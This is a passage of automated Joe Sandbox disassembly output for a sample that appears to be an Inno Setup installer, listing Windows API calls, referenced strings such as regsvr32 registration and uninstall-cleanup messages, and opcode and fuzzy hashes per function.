                                                                              • Instruction Fuzzy Hash: C351A1316002009FD721EB69F945B5A7BE4EB1A314F51847BF805C73A2DB389848CB99
                                                                              APIs
                                                                              • SHGetMalloc.SHELL32(?), ref: 00460DEF
                                                                              • GetActiveWindow.USER32 ref: 00460E53
                                                                              • CoInitialize.OLE32(00000000), ref: 00460E67
                                                                              • SHBrowseForFolder.SHELL32(?), ref: 00460E7E
                                                                              • CoUninitialize.OLE32(00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460E93
                                                                              • SetActiveWindow.USER32(?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EA9
                                                                              • SetActiveWindow.USER32(?,?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EB2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                              • String ID: A
                                                                              • API String ID: 2684663990-3554254475
                                                                              • Opcode ID: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
                                                                              • Instruction ID: e80b4c5213709972e599e89028d95aa00c835143d3680f9f001b64d6594dadc3
                                                                              • Opcode Fuzzy Hash: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
                                                                              • Instruction Fuzzy Hash: 8C3130B0D00218AFDB01EFB6D885A9EBBF8EB09304F51447AF914F7251E7789A04CB59
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5,?,?,00000000,00471F1C), ref: 004719BC
                                                                                • Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6
                                                                                • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5), ref: 00471A33
                                                                              • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000), ref: 00471A39
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                              • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                              • API String ID: 884541143-1710247218
                                                                              • Opcode ID: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
                                                                              • Instruction ID: 88fb20351202849850a9607c8ed9a5972d7e7c37514b441dc4b5c3053575b9e2
                                                                              • Opcode Fuzzy Hash: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
                                                                              • Instruction Fuzzy Hash: 8111E2307005147BD711EA6ECC82B9E73ACDB45714FA1813BB405B72E1DB3C9E02865C
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(030E0000,inflateInit_), ref: 0045C9DD
                                                                              • GetProcAddress.KERNEL32(030E0000,inflate), ref: 0045C9ED
                                                                              • GetProcAddress.KERNEL32(030E0000,inflateEnd), ref: 0045C9FD
                                                                              • GetProcAddress.KERNEL32(030E0000,inflateReset), ref: 0045CA0D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                              • API String ID: 190572456-3516654456
                                                                              • Opcode ID: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
                                                                              • Instruction ID: ca09fd674ca76a7276795bdcbb2c408d45c762c24a12309d3e7b68c52f970bbc
                                                                              • Opcode Fuzzy Hash: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
                                                                              • Instruction Fuzzy Hash: A7011AB0901304DEEB14DF36BEC97273AA5E760B56F14D03B9C55992A2D7780848CB9C
                                                                              APIs
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                              • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                              • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                              • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                              • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Color$StretchText
                                                                              • String ID:
                                                                              • API String ID: 2984075790-0
                                                                              • Opcode ID: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                              • Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
                                                                              • Opcode Fuzzy Hash: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                              • Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68
                                                                              APIs
                                                                                • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457470,?, /s ",?,regsvr32.exe",?,00457470), ref: 004573E2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDirectoryHandleSystem
                                                                              • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                              • API String ID: 2051275411-1862435767
                                                                              • Opcode ID: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                              • Instruction ID: cb1a7ae3e697987e935249ccafc7b98f7c309c2d79f12e82178ec20c33fcefbe
                                                                              • Opcode Fuzzy Hash: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                              • Instruction Fuzzy Hash: 73410670A043086BDB10EFD5D841B9DBBF9AF45305F50407BA918BB292D7789A09CB59
                                                                              APIs
                                                                              • OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
                                                                              • GetSysColor.USER32(00000014), ref: 0044CA04
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
                                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
                                                                              • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
                                                                              • GetSysColor.USER32(00000010), ref: 0044CA56
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
                                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
                                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Text$Color$Draw$OffsetRect
                                                                              • String ID:
                                                                              • API String ID: 1005981011-0
                                                                              • Opcode ID: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                              • Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
                                                                              • Opcode Fuzzy Hash: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                              • Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669
                                                                              APIs
                                                                                • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 004949E1
                                                                              • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004949F5
                                                                              • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494A0F
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A1B
                                                                              • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A21
                                                                              • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A34
                                                                              Strings
                                                                              • Deleting Uninstall data files., xrefs: 00494957
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                              • String ID: Deleting Uninstall data files.
                                                                              • API String ID: 1570157960-2568741658
                                                                              • Opcode ID: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                              • Instruction ID: d482532eb754b17a04c62f956e406d56ab6d113e5f4ee6e28585aa8da354e785
                                                                              • Opcode Fuzzy Hash: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                              • Instruction Fuzzy Hash: 0E219170344204AEEB10EBBAFD42F1737A8D799718F10003BB5049A2E3D67C9C059B6D
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD,?,?,?,?,00000000), ref: 0046F247
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD), ref: 0046F25E
                                                                              • AddFontResourceA.GDI32(00000000), ref: 0046F27B
                                                                              • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F28F
                                                                              Strings
                                                                              • AddFontResource, xrefs: 0046F299
                                                                              • Failed to open Fonts registry key., xrefs: 0046F265
                                                                              • Failed to set value in Fonts registry key., xrefs: 0046F250
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                              • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                              • API String ID: 955540645-649663873
                                                                              • Opcode ID: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                              • Instruction ID: 6d7729dfe4f1a7c8b63a61044efa00ce4130ce7f95034744da23bbcbb22f00e6
                                                                              • Opcode Fuzzy Hash: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                              • Instruction Fuzzy Hash: CC21B278B402007BDB10EBA6AC52F5E779CDB45704F604077B940EB3C2EA7D9D098A6E
                                                                              APIs
                                                                                • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                              • GetVersion.KERNEL32 ref: 00462588
                                                                              • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004625C6
                                                                              • SHGetFileInfo.SHELL32(00462664,00000000,?,00000160,00004011), ref: 004625E3
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 00462601
                                                                              • SetCursor.USER32(00000000,00000000,00007F02,00462664,00000000,?,00000160,00004011), ref: 00462607
                                                                              • SetCursor.USER32(?,00462647,00007F02,00462664,00000000,?,00000160,00004011), ref: 0046263A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                              • String ID: Explorer
                                                                              • API String ID: 2594429197-512347832
                                                                              • Opcode ID: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
                                                                              • Instruction ID: 5d8862978945b954f1aea40d900f189da683ff410d790468fedd90432f5e16a2
                                                                              • Opcode Fuzzy Hash: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
                                                                              • Instruction Fuzzy Hash: DE21E7707407047AE725BB798D47F9A76D89B08708F50407FB605EA1C3E9BD8C1486AE
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                              • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8), ref: 00476E74
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,02112BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                              • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                              • API String ID: 2704155762-2318956294
                                                                              • Opcode ID: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                              • Instruction ID: d2756be845a9a7cec8c09e5f4573334ab46b2fb936870a4cb364c11667d86bc7
                                                                              • Opcode Fuzzy Hash: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                              • Instruction Fuzzy Hash: E301D654340F0436EA30317A8C86FBB644E8B40769F158137BA1CEA2D2DAAC8D15127E
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
                                                                              • LocalFree.KERNEL32(007224A0,00000000,00401B68), ref: 00401ACF
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,007224A0,00000000,00401B68), ref: 00401AEE
                                                                              • LocalFree.KERNEL32(007234A0,?,00000000,00008000,007224A0,00000000,00401B68), ref: 00401B2D
                                                                              • RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
                                                                              • RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                              • String ID: t:r
                                                                              • API String ID: 3782394904-924571639
                                                                              • Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                              • Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
                                                                              • Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                              • Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,004596AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 004595F2
                                                                                • Part of subcall function 00453910: FindClose.KERNEL32(000000FF,00453A06), ref: 004539F5
                                                                              Strings
                                                                              • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459667
                                                                              • Failed to delete directory (%d)., xrefs: 00459688
                                                                              • Stripped read-only attribute., xrefs: 004595B4
                                                                              • Failed to strip read-only attribute., xrefs: 004595C0
                                                                              • Failed to delete directory (%d). Will retry later., xrefs: 0045960B
                                                                              • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004595CC
                                                                              • Deleting directory: %s, xrefs: 0045957B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseErrorFindLast
                                                                              • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                              • API String ID: 754982922-1448842058
                                                                              • Opcode ID: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                              • Instruction ID: 65fff70db6fa7d9e45c4e30736062023b7b7828f3df3317cc7ecb80ce87614ba
                                                                              • Opcode Fuzzy Hash: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                              • Instruction Fuzzy Hash: 7841A330A04209DBCB11DB6AC8013AE76A55F49306F55857FAC0197393DB7C8E0D876E
                                                                              APIs
                                                                              • GetCapture.USER32 ref: 00422EB4
                                                                              • GetCapture.USER32 ref: 00422EC3
                                                                              • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                              • ReleaseCapture.USER32 ref: 00422ECE
                                                                              • GetActiveWindow.USER32 ref: 00422EDD
                                                                              • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                              • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                              • GetActiveWindow.USER32 ref: 00422FCF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                              • String ID:
                                                                              • API String ID: 862346643-0
                                                                              • Opcode ID: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                              • Instruction ID: db8aa600a50c93bece591f99e5806f4c3f5e9428d1b568cd9ed9aa9c7d903083
                                                                              • Opcode Fuzzy Hash: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                              • Instruction Fuzzy Hash: 0A413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF540AB392DB789E40DB5D
                                                                              APIs
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0042F12E
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0042F145
                                                                              • GetActiveWindow.USER32 ref: 0042F14E
                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
